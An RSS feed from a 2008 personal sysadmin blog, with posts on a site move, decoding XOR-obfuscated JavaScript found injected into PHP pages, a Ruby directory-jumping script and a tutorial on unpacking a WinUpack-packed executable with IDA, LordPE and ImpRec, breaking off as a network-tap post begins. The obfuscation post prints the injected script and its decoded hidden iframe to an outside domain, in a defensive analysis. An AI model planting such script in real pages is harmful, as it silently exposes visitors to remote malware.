<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>:wq</title>
	<atom:link href="http://thnetos.wordpress.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://thnetos.wordpress.com</link>
	<description>Tu fui, ego eris</description>
	<lastBuildDate>Sun, 26 May 2013 00:33:53 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.com/</generator>
<cloud domain='thnetos.wordpress.com' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>http://s2.wp.com/i/buttonw-com.png</url>
		<title>:wq</title>
		<link>http://thnetos.wordpress.com</link>
	</image>
	<atom:link rel="search" type="application/opensearchdescription+xml" href="http://thnetos.wordpress.com/osd.xml" title=":wq" />
	<atom:link rel='hub' href='http://thnetos.wordpress.com/?pushpress=hub'/>
		<item>
		<title>New site, blog and feed!</title>
		<link>http://thnetos.wordpress.com/2008/03/09/new-site-blog-and-feed/</link>
		<comments>http://thnetos.wordpress.com/2008/03/09/new-site-blog-and-feed/#comments</comments>
		<pubDate>Mon, 10 Mar 2008 04:25:05 +0000</pubDate>
		<dc:creator>Lee Hinman</dc:creator>
				<category><![CDATA[blog]]></category>
		<category><![CDATA[feed]]></category>
		<category><![CDATA[rss]]></category>
		<category><![CDATA[site]]></category>
		<category><![CDATA[writequit]]></category>

		<guid isPermaLink="false">http://thnetos.wordpress.com/?p=181</guid>
		<description><![CDATA[I am extremely happy to announce the opening of my new site: writequit.org! I&#8217;ve already transitioned all of my older blog posts over to the new site (although I have not updated every link), as well as hosting my blog, &#8230; <a href="http://thnetos.wordpress.com/2008/03/09/new-site-blog-and-feed/">Continue reading <span class="meta-nav">&#8594;</span></a><img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=thnetos.wordpress.com&#038;blog=19195&#038;post=181&#038;subd=thnetos&#038;ref=&#038;feed=1" width="1" height="1" />]]></description>
				<content:encoded><![CDATA[<p>I am extremely happy to announce the opening of my new site: <u><b>writequit.org</b></u>!</p>
<p>I&#8217;ve already transitioned all of my older blog posts over to the new site (although I have not updated every link), as well as hosting my blog, the new site has sections for projects that I&#8217;m working on. I&#8217;m hoping not to lose all my readers in the move <img src='http://s1.wp.com/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<p>The new site is:</p>
<h2><a href="http://writequit.org">http://writequit.org</a></h2>
<p>The new blog is at:</p>
<h2><a href="http://writequit.org/blog">http://writequit.org/blog</a></h2>
<p><u>Don&#8217;t forget to update your bookmarks and RSS feeds!</u></p>
<p>(this blog will continue to exist as an archive of my older posts)</p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/thnetos.wordpress.com/181/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/thnetos.wordpress.com/181/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/thnetos.wordpress.com/181/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/thnetos.wordpress.com/181/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=thnetos.wordpress.com&#038;blog=19195&#038;post=181&#038;subd=thnetos&#038;ref=&#038;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://thnetos.wordpress.com/2008/03/09/new-site-blog-and-feed/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/4536ba4e184002807cd1de1ce5ccd574?s=96&#38;d=http%3A%2F%2F1.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D96&#38;r=G" medium="image">
			<media:title type="html">thnetos</media:title>
		</media:content>
	</item>
		<item>
		<title>Obfuscated javascript fun</title>
		<link>http://thnetos.wordpress.com/2008/03/05/obfuscated-javascript-fun/</link>
		<comments>http://thnetos.wordpress.com/2008/03/05/obfuscated-javascript-fun/#comments</comments>
		<pubDate>Wed, 05 Mar 2008 19:25:07 +0000</pubDate>
		<dc:creator>Lee Hinman</dc:creator>
				<category><![CDATA[iframe]]></category>
		<category><![CDATA[javascript]]></category>
		<category><![CDATA[obfuscation]]></category>
		<category><![CDATA[php]]></category>
		<category><![CDATA[ruby]]></category>
		<category><![CDATA[script]]></category>

		<guid isPermaLink="false">http://thnetos.wordpress.com/?p=180</guid>
		<description><![CDATA[A friend of mine (thanks Legit) turned me on to this piece of javascript found in the midst of some PHP: &#60;script language="JavaScript"&#62; var0 = "x69x3cx33x27x34x38x30x75x3bx34"; var1 = "x38x30x68x72x36x3ax20x3bx21x30"; var2 = "x27x72x75x26x27x36x68x72x3dx21"; var3 = "x21x25x6fx7ax7ax33x27x34x38x30"; var4 = "x26x21x34x21x7bx3bx30x21x7ax3c"; var5 = &#8230; <a href="http://thnetos.wordpress.com/2008/03/05/obfuscated-javascript-fun/">Continue reading <span class="meta-nav">&#8594;</span></a><img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=thnetos.wordpress.com&#038;blog=19195&#038;post=180&#038;subd=thnetos&#038;ref=&#038;feed=1" width="1" height="1" />]]></description>
				<content:encoded><![CDATA[<p>A friend of mine (thanks <a href="http://codingnotes.wordpress.com/">Legit</a>) turned me on to this piece of javascript found in the midst of some PHP:</p>
<blockquote><p><code>&lt;script language="JavaScript"&gt;<br />
var0 = "x69x3cx33x27x34x38x30x75x3bx34"; var1 = "x38x30x68x72x36x3ax20x3bx21x30"; var2 = "x27x72x75x26x27x36x68x72x3dx21"; var3 = "x21x25x6fx7ax7ax33x27x34x38x30"; var4 = "x26x21x34x21x7bx3bx30x21x7ax3c"; var5 = "x3bx31x30x2dx67x7bx25x3dx25x72"; var6 = "x75x3dx30x3cx32x3dx21x68x72x64"; var7 = "x63x72x75x22x3cx31x21x3dx68x72"; var8 = "x64x63x72x75x33x27x34x38x30x37"; var9 = "x3ax27x31x30x27x68x72x65x72x75"; var10 = "x26x36x27x3ax39x39x3cx3bx32x68"; var11 = "x72x3bx3ax72x6bx69x7ax3cx33x27"; var12 = "x34x38x30x6b";<br />
sr = var0+var1+var2+var3+var4+var5+var6+var7+var8+var9+var10+var11+var12;<br />
dst = "";<br />
for(i = 0; i &lt; sr.length; i++) {<br />
var d = parseInt(sr.charCodeAt(i) ^ 85);<br />
dst = dst + String.fromCharCode(d);<br />
}<br />
document.getElementById("testws35fdgh").innerHTML = dst;<br />
&lt;/script&gt;</code></p></blockquote>
<p>The &#8220;getElementById&#8221; that testws35fdgh refers to is this empty div:</p>
<p><code>&lt;div id="testws35fdgh"&gt;&lt;/div&gt;</code></p>
<p>As it turns out, this is some really terrible obfuscation, here&#8217;s the simple script to decode it (written in <a href="http://ruby-lang.org">Ruby</a> because I like Ruby):</p>
<blockquote><p><code>#!/usr/bin/env ruby<br />
hex = ["x69","x3c","x33","x27","x34","x38",<br />
"x30","x75","x3b","x34","x38","x30","x68",<br />
"x72","x36","x3a","x20","x3b","x21","x30",<br />
"x27","x72","x75","x26","x27","x36","x68",<br />
"x72","x3d","x21","x21","x25","x6f","x7a",<br />
"x7a","x33","x27","x34","x38","x30","x26",<br />
"x21","x34","x21","x7b","x3b","x30","x21",<br />
"x7a","x3c","x3b","x31","x30","x2d","x67",<br />
"x7b","x25","x3d","x25","x72","x75","x3d",<br />
"x30","x3c","x32","x3d","x21","x68","x72",<br />
"x64","x63","x72","x75","x22","x3c","x31",<br />
"x21","x3d","x68","x72","x64","x63","x72",<br />
"x75","x33","x27","x34","x38","x30","x37",<br />
"x3a","x27","x31","x30","x27","x68","x72",<br />
"x65","x72","x75","x26","x36","x27","x3a",<br />
"x39","x39","x3c","x3b","x32","x68","x72",<br />
"x3b","x3a","x72","x6b","x69","x7a","x3c",<br />
"x33","x27","x34","x38","x30","x6b"]<br />
line = ""<br />
hex.each { |c|<br />
## Unpack the char<br />
c = c.unpack('c').to_s.to_i<br />
## XOR with 85<br />
d = c ^ 85<br />
## Pack back into a character<br />
t = [d].pack('c')<br />
## Append to the line<br />
line = line + t<br />
}<br />
puts line</code></p></blockquote>
<p>Which eventually leads you to:</p>
<p><code>&lt;iframe name='counter' src='http://framestat.net/index2.php' height='16' width='16' frameborder='0' scrolling='no'&gt;&lt;/iframe&gt;</code></p>
<p>If you do a <a href="http://dnsstuff.com">whois</a> on the framestat.net domain, you can see that the domain was suspended:</p>
<blockquote><p><code>Registrant:<br />
Suspended Domain ****@4host.info +1.00000000<br />
Suspended domain<br />
Suspended domain<br />
Suspended domain,<br />
Suspended domain,US 94040</code></p>
<p><code>Registration Service Provider:<br />
name: Rustelekom Ltd.<br />
tel: +1.8666254678<br />
fax: +1.9782465632<br />
web:<a href="http://nameservers.ru" rel="nofollow">http://nameservers.ru</a></code></p></blockquote>
<p>Looks like someone&#8217;s been up to something naughty <img src='http://s1.wp.com/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' />  It also looks like it was originally a Russian site (not that it matters). Since the site is down, it&#8217;s difficult to tell what would have happened if the iframe source still existed. I&#8217;m guessing malware.</p>
<p>Still, the question remains, how did the javascript get to the page? I&#8217;m still looking in to that, right now my theory is php remote-file-inclusion, but we&#8217;ll see as things become a bit more clear.</p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/thnetos.wordpress.com/180/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/thnetos.wordpress.com/180/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/thnetos.wordpress.com/180/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/thnetos.wordpress.com/180/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=thnetos.wordpress.com&#038;blog=19195&#038;post=180&#038;subd=thnetos&#038;ref=&#038;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://thnetos.wordpress.com/2008/03/05/obfuscated-javascript-fun/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/4536ba4e184002807cd1de1ce5ccd574?s=96&#38;d=http%3A%2F%2F1.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D96&#38;r=G" medium="image">
			<media:title type="html">thnetos</media:title>
		</media:content>
	</item>
		<item>
		<title>The ZoomGo script, quickly move anywhere you want to be</title>
		<link>http://thnetos.wordpress.com/2008/02/29/the-zoomgo-script-quickly-move-anywhere-you-want-to-be/</link>
		<comments>http://thnetos.wordpress.com/2008/02/29/the-zoomgo-script-quickly-move-anywhere-you-want-to-be/#comments</comments>
		<pubDate>Fri, 29 Feb 2008 19:44:02 +0000</pubDate>
		<dc:creator>Lee Hinman</dc:creator>
				<category><![CDATA[ruby]]></category>
		<category><![CDATA[script]]></category>
		<category><![CDATA[sysadmin]]></category>
		<category><![CDATA[zoomgo]]></category>
		<category><![CDATA[zsh]]></category>

		<guid isPermaLink="false">http://thnetos.wordpress.com/?p=178</guid>
		<description><![CDATA[One of the most important traits of being a SysAdmin is laziness (well, not really laziness, but recognizing repetitive action and taking steps to automate it). In the effort to combat repetitive changing directories, I have written a tiny (&#60; &#8230; <a href="http://thnetos.wordpress.com/2008/02/29/the-zoomgo-script-quickly-move-anywhere-you-want-to-be/">Continue reading <span class="meta-nav">&#8594;</span></a><img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=thnetos.wordpress.com&#038;blog=19195&#038;post=178&#038;subd=thnetos&#038;ref=&#038;feed=1" width="1" height="1" />]]></description>
				<content:encoded><![CDATA[<p>One of the most important traits of being a SysAdmin is laziness (well, not really laziness, but recognizing repetitive action and taking steps to automate it). In the effort to combat repetitive changing directories, I have written a tiny (&lt; 100 lines) Ruby script to handle &#8220;zooming&#8221; to a particular directory.</p>
<p>Firstly, <a href="http://thnetos.files.wordpress.com/2008/02/zgrb.txt">download the script here</a> and put it somewhere in your path (rename it to &#8220;zg.rb&#8221;). Make sure to chmod +x it so it&#8217;s executable.</p>
<p>Note, 3 of the lines in the script *MAY* need to be changed, they are:</p>
<p><code>$DFDIR = "/Users/hinmanm/.zg"<br />
$ZGCONF = $DFDIR + "/zg.conf"<br />
$FINDCMD = "find"</code></p>
<p>Change the DFDIR entry to be where you plan on storing your ZoomGo files. Make sure you create the directory you specified, as you can see about, mine is set to ~/.zg. You shouldn&#8217;t have to change the ZGCONF file unless you want to. The FINDCMD variable is because on FreeBSD, when you install the &#8220;findutils&#8221; package, the find command is &#8220;gfind&#8221;, so change this to whatever your find command is (&#8216;find&#8217; should be fine for most people).</p>
<p>In the ~/.zg/zg.conf file (or wherever your DFDIR and ZGCONF locations are), entries are specified with a directory name, rescan time and directory name glob. The entries in my ~/.zg/zg.conf file are:</p>
<p><code>~/src:10:*<br />
~/pcap:10:*<br />
~/hex:10:*<br />
~/Torrents:30:*<br />
~/Random:60:*<br />
~/Pictures:10:*<br />
/Volumes/VAULT:20:*</code></p>
<p>What this means is: &#8220;<b>look at my ~/src directory, rescan it if it&#8217;s older than 10 minutes and search for all directories (*)</b>&#8220;, etc. I also search my pcap directory, the hex source tree directory, my Torrents and Random files and my <a href="http://www.truecrypt.org/">TrueCrypt</a> vault drive (When it&#8217;s mounted).</p>
<p>Next, I added the following line to my ~/.zshrc (I use <a href="http://zsh.sourceforge.net/">ZSH</a>, but the syntax for <a href="http://www.gnu.org/software/bash/">Bash</a> would be almost exactly the same):</p>
<p><code>## For the "ZoomGo" ruby file<br />
function zg () {<br />
eval cd `zg.rb $1`<br />
}</code></p>
<p>Yea, it&#8217;s kind of a hackish way to do it, but it works. After starting a new zsh, you should now be able to type &#8220;zg &lt;dirname&gt;&#8221; to use ZoomGo on a directory. For example:</p>
<p><code>~$ zg aimsnarf<br />
Zooming directly to /Users/hinmanm/src/ruby/aimsnarf...<br />
~/src/ruby/aimsnarf$</code></p>
<p>When you first run ZoomGo, it will rescan all the directories that you specified in the zg.conf file, saving the datafiles in the DFDIR. If the data file hasn&#8217;t been updated in the given rescan time (like 10 minutes for my ~/src directory) it will also rescan the directory and you&#8217;ll see messages like this:</p>
<p><code>rescanning ~/src...<br />
rescanning ~/pcap...<br />
rescanning ~/hex...</code><br />
&#8230; and so on</p>
<p>You can also manually rescan all the directories by adding the &#8220;&#8211;rescan&#8221; flag.</p>
<p>Now, let&#8217;s say you have 2 directories that are both named the same thing, here&#8217;s an example when I run &#8220;zg aim&#8221;</p>
<p><code>~$ zg aim<br />
2 directories were returned.<br />
(1)    /Users/hinmanm/pcap/aim<br />
(2)    /Volumes/VAULT/pcap/aim<br />
1<br />
~/pcap/aim$</code></p>
<p>See that? ZoomGo asks you to choose which directory to zoom to if there is more than 1 option, at the moment, it doesn&#8217;t like more than 9 directories, but hopefully I&#8217;ll fix that later</p>
<p>There, wasn&#8217;t that easier than typing &#8220;cd ~/pcap/aim&#8221;, now try it for a longer directory:</p>
<p><code>~$ zg nsm-console<br />
2 directories were returned.<br />
(1)    /Users/hinmanm/hex/hex/rawpacket-root/usr/home/analyzt/rp-NSM/nsm-console<br />
(2)    /Users/hinmanm/hex/hex2/rawpacket-root/usr/home/analyzt/rp-NSM/nsm-console<br />
2<br />
~/hex/hex2/rawpacket-root/usr/home/analyzt/rp-NSM/nsm-console$</code></p>
<p>Enjoy <img src='http://s0.wp.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/thnetos.wordpress.com/178/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/thnetos.wordpress.com/178/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/thnetos.wordpress.com/178/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/thnetos.wordpress.com/178/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=thnetos.wordpress.com&#038;blog=19195&#038;post=178&#038;subd=thnetos&#038;ref=&#038;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://thnetos.wordpress.com/2008/02/29/the-zoomgo-script-quickly-move-anywhere-you-want-to-be/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/4536ba4e184002807cd1de1ce5ccd574?s=96&#38;d=http%3A%2F%2F1.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D96&#38;r=G" medium="image">
			<media:title type="html">thnetos</media:title>
		</media:content>
	</item>
		<item>
		<title>Tutorial: Finding the OEP of an Upacked binary file</title>
		<link>http://thnetos.wordpress.com/2008/02/25/tutorial-finding-the-oep-of-an-upacked-binary-file/</link>
		<comments>http://thnetos.wordpress.com/2008/02/25/tutorial-finding-the-oep-of-an-upacked-binary-file/#comments</comments>
		<pubDate>Mon, 25 Feb 2008 19:57:26 +0000</pubDate>
		<dc:creator>Lee Hinman</dc:creator>
				<category><![CDATA[binary]]></category>
		<category><![CDATA[disassemble]]></category>
		<category><![CDATA[ida]]></category>
		<category><![CDATA[lordpe]]></category>
		<category><![CDATA[oep]]></category>
		<category><![CDATA[peid]]></category>
		<category><![CDATA[reverse]]></category>
		<category><![CDATA[upack]]></category>
		<category><![CDATA[windows]]></category>
		<category><![CDATA[winupack]]></category>

		<guid isPermaLink="false">http://thnetos.wordpress.com/?p=160</guid>
		<description><![CDATA[&#8230;because all the other tutorials I&#8217;ve been able to find on this subject are not so easy to read. This is going to be a long post, but hey, at least it&#8217;ll have lots of pictures! Alright, in this tutorial &#8230; <a href="http://thnetos.wordpress.com/2008/02/25/tutorial-finding-the-oep-of-an-upacked-binary-file/">Continue reading <span class="meta-nav">&#8594;</span></a><img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=thnetos.wordpress.com&#038;blog=19195&#038;post=160&#038;subd=thnetos&#038;ref=&#038;feed=1" width="1" height="1" />]]></description>
				<content:encoded><![CDATA[<p>&#8230;because all the other tutorials I&#8217;ve been able to find on this subject are not so easy to read.</p>
<p>This is going to be a long post, but hey, at least it&#8217;ll have lots of pictures!</p>
<p>Alright, in this tutorial I&#8217;m going to attempt to explain how to find the OEP (Original Entry Point) of a binary executable that has been packed with the <a href="http://www.wex.cn/dwing/">Upack/WinUpack packer</a>. I just recently learned this myself, so please excuse any errors this tutorial might have. In this tutorial, the following tools are used:</p>
<ul>
<li><a href="http://www.peid.info/">PEiD</a></li>
<li><a href="http://www.hex-rays.com/idapro/">IDA-Disassembler</a> (I used the freeware version, 4.9)</li>
<li><a href="http://y0da.cjb.net/">LordPE</a></li>
<li><a href="http://vault.reversers.org/ImpRECDef">ImpRec</a></li>
<li><a href="http://microsoft.com">Windows</a></li>
</ul>
<p><span id="more-160"></span></p>
<p>Sadly, I haven&#8217;t figured out how to get this working the same way in Ollydbg yet, but perhaps for a later tutorial. Alright, let&#8217;s dive right in. In this example, I&#8217;ll be using the &#8220;calc.exe&#8221; application (Windows calculator) that I packed with WinUpack. The first thing to do is load the file into PEiD to try and determine what kind of packer was used on the file:</p>
<div style="text-align:center;"><img src="http://thnetos.files.wordpress.com/2008/02/0peid.png?w=500" alt="0peid.png" border="0" /></div>
<p>You can see in the red square above that this file was packed with WinUpack 0.39 final, which is good because that&#8217;s what this tutorial is about <img src='http://s1.wp.com/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<p>The next thing to do is load the executable into IDA-pro, IDA will complain about the file, but for the most part these complaints can be ignored, just click &#8220;ok&#8221; and &#8220;yes&#8221; until you see something similar to below:</p>
<div style="text-align:center;"><a href="http://thnetos.files.wordpress.com/2008/02/1idastart.png" title="Direct link to file"><img src="http://thnetos.files.wordpress.com/2008/02/1idastart.thumbnail.png?w=171&#038;h=108" alt="1idastart.png" border="0" height="108" width="171" /></a></div>
<p>Here, you can see the start of the file, the line we&#8217;re most interested in is (in this file), the line at <code>0100101F</code>, which is a <code>"push dword ptr [esi+34h]</code>&#8221; instruction. Select this line and hit <b>F2</b> to toggle a breakpoint on this line. The line should highlight red just like the picture below:</p>
<div style="text-align:center;"><a href="http://thnetos.files.wordpress.com/2008/02/2pushbp.png" title="Direct link to file"><img src="http://thnetos.files.wordpress.com/2008/02/2pushbp.thumbnail.png?w=171&#038;h=108" alt="2pushbp.png" border="0" height="108" width="171" /></a></div>
<p>Now, press F9 to run the file until it encounters the breakpoint. When IDA does encounter it, the display will change to the following style, take note of the IDA-view ESP box highlighted in red below, that&#8217;s what&#8217;s going to be important coming up:</p>
<div style="text-align:center;"> <a href="http://thnetos.files.wordpress.com/2008/02/3running.png" title="Direct link to file"><img src="http://thnetos.files.wordpress.com/2008/02/3running.thumbnail.png?w=171&#038;h=108" alt="3running.png" border="0" height="108" width="171" /></a></div>
<p>Right click on the ESP address (in this case <code>0007FFC0</code>) and set a breakpoint, we want to set a hardware breakpoint or size 4 on this address, see the picture below for what I mean:</p>
<div style="text-align:center;"><a href="http://thnetos.files.wordpress.com/2008/02/4hwbp.png" title="Direct link to file"><img src="http://thnetos.files.wordpress.com/2008/02/4hwbp.thumbnail.png?w=72&#038;h=128" alt="4hwbp.png" border="0" height="128" width="72" /></a></div>
<p>After setting it, the line will highlight red like this:</p>
<div style="text-align:center;"><a href="http://thnetos.files.wordpress.com/2008/02/5hwbp2.png" title="Direct link to file"><img src="http://thnetos.files.wordpress.com/2008/02/5hwbp2.png?w=500" alt="5hwbp2.png" border="0" /></a></div>
<p>When the breakpoint has been set, continue running the file by hitting &#8216;F9&#8242; again. When IDA hits the breakpoint, you&#8217;ll see the following two windows:</p>
<div style="text-align:center;"><a href="http://thnetos.files.wordpress.com/2008/02/6afterhwbp.png" title="Direct link to file"><img src="http://thnetos.files.wordpress.com/2008/02/6afterhwbp.thumbnail.png?w=171&#038;h=43" alt="6afterhwbp.png" border="0" height="43" width="171" /></a></div>
<p>Notice the red box, <b>this is our new OEP</b>: <code>01012475</code>. Write this number down somewhere (or remember it). Now that we know our OEP, we need to dump the file and fix the imports, the first step to dump the file is to open up LordPE and select the running calc.exe process, as seen below:</p>
<div style="text-align:center;"><img src="http://thnetos.files.wordpress.com/2008/02/7lordpe.png?w=500" alt="7lordpe.png" border="0" /></div>
<p>Right-click on the file and click on &#8220;dump full&#8221;, as you see here (I saved my file as calc-dump.exe):</p>
<div style="text-align:center;"><img src="http://thnetos.files.wordpress.com/2008/02/8lordpedump.png?w=644&#038;h=351" alt="8lordpedump.png" border="0" height="351" width="644" /></div>
<p>Here you can see a comparison of the sizes of the packed and unpacked files:</p>
<div style="text-align:center;"><img src="http://thnetos.files.wordpress.com/2008/02/9sizecmp.png?w=500" alt="9sizecmp.png" border="0" /></div>
<p>Let&#8217;s run the file and see what we get, oops, looks like we get the error below:</p>
<div style="text-align:center;"><img src="http://thnetos.files.wordpress.com/2008/02/10iatmissing.png?w=500" alt="10iatmissing.png" border="0" /></div>
<p>This means the import table is all messed up, we&#8217;ll have to fix it. In order to do that, fire up ImpRec and point it at the active calc.exe process, in the OEP box, enter the OEP we found earlier (just the offset, which in this case is 12475):</p>
<div style="text-align:center;"><a href="http://thnetos.files.wordpress.com/2008/02/11imprecnewoep.png" title="Direct link to file"><img src="http://thnetos.files.wordpress.com/2008/02/11imprecnewoep.thumbnail.png?w=159&#038;h=128" alt="11imprecnewoep.png" border="0" height="128" width="159" /></a></div>
<p>Then, click on &#8220;IAT Autosearch&#8221;, you should see a message like this:</p>
<div style="text-align:center;"><img src="http://thnetos.files.wordpress.com/2008/02/12autosearch.png?w=500" alt="12autosearch.png" /></div>
<p>Click on &#8220;Get Imports&#8221; and the window should be filled with a list of imports found in the file, like this:</p>
<div style="text-align:center;"><a href="http://thnetos.files.wordpress.com/2008/02/13importsfound.png" title="13importsfound.png"><img src="http://thnetos.files.wordpress.com/2008/02/13importsfound.thumbnail.png?w=500" alt="13importsfound.png" border="0" /></a></div>
<p>In order to fix the dump, click on &#8220;Fix Dump&#8221; and select the file you dumped earlier (in my case it was calc-dump.exe), ImpRec will fix the dump and save a new file, if it works correctly, you should see these messages in the log:</p>
<div style="text-align:center;"><a href="http://thnetos.files.wordpress.com/2008/02/14fixdump.png" title="14fixdump.png"><img src="http://thnetos.files.wordpress.com/2008/02/14fixdump.thumbnail.png?w=500" alt="14fixdump.png" border="0" /></a></div>
<p>Let&#8217;s compare these size of all 3 of these files:</p>
<div style="text-align:center;"><img src="http://thnetos.files.wordpress.com/2008/02/15sizecmp2.png?w=500" alt="15sizecmp2.png" /></div>
<p>And now, try and run the file:</p>
<div style="text-align:center;"><a href="http://thnetos.files.wordpress.com/2008/02/16running.png" title="16running.png"><img src="http://thnetos.files.wordpress.com/2008/02/16running.thumbnail.png?w=500" alt="16running.png" border="0" /></a></div>
<p>Hurray! It worked! From here you can do everything you need with the file, since it is no longer packed. I hope this helps someone, it certainly helped me understand unpacking a little bit better. Now I can get to unpacking that malware I captured earlier&#8230;</p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/thnetos.wordpress.com/160/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/thnetos.wordpress.com/160/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/thnetos.wordpress.com/160/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/thnetos.wordpress.com/160/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=thnetos.wordpress.com&#038;blog=19195&#038;post=160&#038;subd=thnetos&#038;ref=&#038;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://thnetos.wordpress.com/2008/02/25/tutorial-finding-the-oep-of-an-upacked-binary-file/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/4536ba4e184002807cd1de1ce5ccd574?s=96&#38;d=http%3A%2F%2F1.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D96&#38;r=G" medium="image">
			<media:title type="html">thnetos</media:title>
		</media:content>

		<media:content url="http://thnetos.files.wordpress.com/2008/02/0peid.png" medium="image">
			<media:title type="html">0peid.png</media:title>
		</media:content>

		<media:content url="http://thnetos.files.wordpress.com/2008/02/1idastart.thumbnail.png" medium="image">
			<media:title type="html">1idastart.png</media:title>
		</media:content>

		<media:content url="http://thnetos.files.wordpress.com/2008/02/2pushbp.thumbnail.png" medium="image">
			<media:title type="html">2pushbp.png</media:title>
		</media:content>

		<media:content url="http://thnetos.files.wordpress.com/2008/02/3running.thumbnail.png" medium="image">
			<media:title type="html">3running.png</media:title>
		</media:content>

		<media:content url="http://thnetos.files.wordpress.com/2008/02/4hwbp.thumbnail.png" medium="image">
			<media:title type="html">4hwbp.png</media:title>
		</media:content>

		<media:content url="http://thnetos.files.wordpress.com/2008/02/5hwbp2.png" medium="image">
			<media:title type="html">5hwbp2.png</media:title>
		</media:content>

		<media:content url="http://thnetos.files.wordpress.com/2008/02/6afterhwbp.thumbnail.png" medium="image">
			<media:title type="html">6afterhwbp.png</media:title>
		</media:content>

		<media:content url="http://thnetos.files.wordpress.com/2008/02/7lordpe.png" medium="image">
			<media:title type="html">7lordpe.png</media:title>
		</media:content>

		<media:content url="http://thnetos.files.wordpress.com/2008/02/8lordpedump.png" medium="image">
			<media:title type="html">8lordpedump.png</media:title>
		</media:content>

		<media:content url="http://thnetos.files.wordpress.com/2008/02/9sizecmp.png" medium="image">
			<media:title type="html">9sizecmp.png</media:title>
		</media:content>

		<media:content url="http://thnetos.files.wordpress.com/2008/02/10iatmissing.png" medium="image">
			<media:title type="html">10iatmissing.png</media:title>
		</media:content>

		<media:content url="http://thnetos.files.wordpress.com/2008/02/11imprecnewoep.thumbnail.png" medium="image">
			<media:title type="html">11imprecnewoep.png</media:title>
		</media:content>

		<media:content url="http://thnetos.files.wordpress.com/2008/02/12autosearch.png" medium="image">
			<media:title type="html">12autosearch.png</media:title>
		</media:content>

		<media:content url="http://thnetos.files.wordpress.com/2008/02/13importsfound.thumbnail.png" medium="image">
			<media:title type="html">13importsfound.png</media:title>
		</media:content>

		<media:content url="http://thnetos.files.wordpress.com/2008/02/14fixdump.thumbnail.png" medium="image">
			<media:title type="html">14fixdump.png</media:title>
		</media:content>

		<media:content url="http://thnetos.files.wordpress.com/2008/02/15sizecmp2.png" medium="image">
			<media:title type="html">15sizecmp2.png</media:title>
		</media:content>

		<media:content url="http://thnetos.files.wordpress.com/2008/02/16running.thumbnail.png" medium="image">
			<media:title type="html">16running.png</media:title>
		</media:content>
	</item>
		<item>
		<title>Create a passive network tap for your home network</title>
		<link>http://thnetos.wordpress.com/2008/02/22/create-a-passive-network-tap-for-your-home-network/</link>
		<comments>http://thnetos.wordpress.com/2008/02/22/create-a-passive-network-tap-for-your-home-network/#comments</comments>
		<pubDate>Fri, 22 Feb 2008 18:30:14 +0000</pubDate>
		<dc:creator>Lee Hinman</dc:creator>
				<category><![CDATA[bridge]]></category>
		<category><![CDATA[freebsd]]></category>
		<category><![CDATA[ids]]></category>
		<category><![CDATA[network]]></category>
		<category><![CDATA[nsm]]></category>
		<category><![CDATA[passive]]></category>
		<category><![CDATA[snort]]></category>
		<category><![CDATA[tap]]></category>

